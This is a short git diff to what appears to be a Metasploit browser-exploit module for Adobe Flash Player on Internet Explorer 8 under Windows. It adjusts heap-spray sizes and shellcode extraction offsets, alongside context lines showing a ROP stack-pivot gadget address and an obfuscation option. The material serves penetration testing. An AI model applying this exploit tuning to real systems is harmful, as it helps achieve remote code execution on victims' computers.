diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
index 7222ebcb2d..b2a15b333f 100644
--- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -109,8 +109,8 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Pivot'   => 0x7c348b05,  #XCHG EAX,ESP; RETN (MSVCR71.dll)
 							'Offset1' => '0x5F4',     #Offset for rop+payload
 							'Offset2' => '0x02',      #Offset to 0x11111110
-							'Max1'    => '0x150',     #First spray
-							'Max2'    => '0x200'      #Second spray
+							'Max1'    => '0x101',     #First spray
+							'Max2'    => '0x300'      #Second spray
 						}
 					]
 				],
@@ -123,6 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])
 			], self.class
 		)
+
 	end
 
 	def exploit
@@ -232,7 +233,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		#Extract string based on target
 		if my_target.name == 'IE 8 on Windows 7'
-			js_extract_str = "var block = shellcode.substring(0, (0x7ffc0-6)/2);"
+			js_extract_str = "var block = shellcode.substring(0, (0x7ff00-6)/2);"
 		elsif my_target.name == 'IE 8 on Windows XP SP3'
 			js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"
 		else